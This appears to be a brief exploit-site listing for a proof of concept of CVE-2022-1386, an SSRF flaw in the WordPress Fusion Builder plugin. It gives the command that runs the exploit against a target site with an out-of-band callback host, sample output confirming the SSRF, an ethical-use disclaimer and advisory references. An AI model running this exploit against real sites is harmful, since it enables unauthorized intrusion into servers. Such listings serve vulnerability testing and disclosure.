Share
## https://sploitus.com/exploit?id=D102BEB0-775B-544D-A01F-0740C2122C8F
# CVE-2022-1386 โ€“ Fusion Builder  
```

Example:
```bash
python3 exploit_cve_2022_1386.py https://vulnerable.site https://abc123.oast.fun
```

Use Interact.sh or [Burp Collaborator] to receive the callback.

๐Ÿ“‹ Sample Output
```bash
[*] Fetching nonce from target...
[*] Sending SSRF payload to https://abc123.oast.fun...
[+] SSRF confirmed: received callback from victim server.
```

๐Ÿ“Œ Notes
This PoC avoids data exfiltration.
Ethical usage only: do not exploit systems without authorization.

๐Ÿ“š References
https://wpscan.com/vulnerability/bf7034ab-24c4-461f-a709-3f73988b536b
https://theme-fusion.com/documentation/avada/fusion-builder-changelog/